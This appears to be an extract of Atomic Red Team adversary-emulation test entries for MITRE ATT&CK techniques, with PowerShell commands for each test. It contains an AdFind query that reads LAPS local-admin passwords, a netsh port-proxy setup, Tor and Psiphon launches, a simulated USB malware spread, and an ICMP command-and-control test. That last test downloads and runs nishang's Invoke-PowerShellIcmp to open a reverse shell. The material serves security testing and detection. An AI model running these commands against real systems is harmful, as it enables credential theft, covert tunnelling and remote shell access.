& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
T1090.001 powershell elevated windows portproxy reg key
Internal Proxy
Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4. Upon execution there will be a new proxy entry in the output of netsh interface portproxy show all.
netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}
T1090.003 powershell windows Psiphon
Multi-hop Proxy
Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide uncensored access to the Internet. This process will launch Psiphon 3 and establish a connection. Shortly after, it will be shut down via process kill commands. More information about Psiphon can be found at the following URLs: http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html https://psiphon.ca/faq.html
& "PathToAtomicsFolder\T1090.003\src\Psiphon.bat"
T1090.003 powershell windows Tor Proxy Usage - Windows
Multi-hop Proxy
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy will be launched, run for 60 seconds, and then exit.
invoke-expression 'cmd /c start powershell -Command {cmd /c "#{TorExe}"}'
sleep -s 60
stop-process -name "tor" | out-null
T1091 powershell windows USB Malware Spread Simulation
Replication Through Removable Media
Simulates an adversary copying malware to all connected removable drives.
$RemovableDrives=@()
$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID
ForEach ($Drive in $RemovableDrives)
{
write-host "Removable Drive Found:" $Drive
New-Item -Path $Drive/T1091Test1.txt -ItemType "file" -Force -Value "T1091 Test 1 has created this file to simulate malware spread to removable drives."
}
T1095 powershell windows ICMP C2
Non-Application Layer Protocol
This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}